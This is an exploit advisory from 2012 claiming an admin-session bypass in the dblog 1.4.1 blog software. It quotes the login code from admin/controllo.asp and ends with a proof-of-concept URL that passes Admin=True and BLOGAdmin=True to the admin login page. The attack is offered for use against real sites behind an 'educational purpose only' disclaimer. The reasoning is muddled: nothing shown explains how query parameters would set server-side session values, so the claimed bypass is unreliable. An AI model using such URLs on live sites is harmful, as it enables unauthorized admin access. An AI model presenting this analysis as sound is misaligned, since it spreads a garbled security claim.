# -------------------------------- #
 Author : L3b-r1'z
 Date : 3/6/2012
 Title : dblog Insecure Session \ Bypass Admin Vulnerability
 Version : 1.4.1
 Download : http://www.dblog.it/sito/download.asp
 Dork : N\A
# -------------------------------- #
 This proof of concept code was written for educational purpose only.
 Use it at your own risk. Author will be not responsible for any damage.
# -------------------------------- #
 1) Bug
 2) P0c
# -------------------------------- #

1) Bug :

Vuln In File admin/controllo.asp .

in line 10 and 11 :
FUserID = Request.Form("UserID")
FPassword = Request.Form("Password")
we have here Request FORM Is Like $_POST
Lets See Below Of Code :)

#### Start ####

If NOT RSAutori.EOF Then
      RSAutori.MoveFirst
      If RSAutori("Password") = FPassword Then
        Session("BLOGNick") = RSAutori("Nick")
        Session.TimeOut = 60
        If RSAutori("Admin") = True Then
          Session("BLOGAdmin") = True
        Else
          Session("BLOGAdmin") = False
        End If
        Response.Redirect "default.asp"
      Else
        Session("BLOGNick") = ""
        Session("BLOGAdmin") = False
        Response.Redirect "login.asp"
      End If
    Else
      Session("BLOGNick") = ""
      Session("BLOGAdmin") = False
      Response.Redirect "login.asp"
    End If
  Else
    Session("BLOGNick") = ""
    Session("BLOGAdmin") = False
    Response.Redirect "login.asp"
  End If

#### End ####

We have timeout 60 , that mean admin can be in page 60 min only , but
when we bypass , we don't have any time :D
look to

If RSAutori("Admin") = True Then
          Session("BLOGAdmin") = True
          
if admin true and BLOGAdmin true  End If Response.Redirect
"default.asp" Redirect To Admin Page :D , Else BLOGnick And BLOGAdmin
False , Redirect To Login.asp File :D

# -------------------------------- #

2) p0c :
http://domain.tld/admin/login.asp?Admin=True&&BLOGAdmin=True

You Will See Admin Panel :)
# -------------------------------- #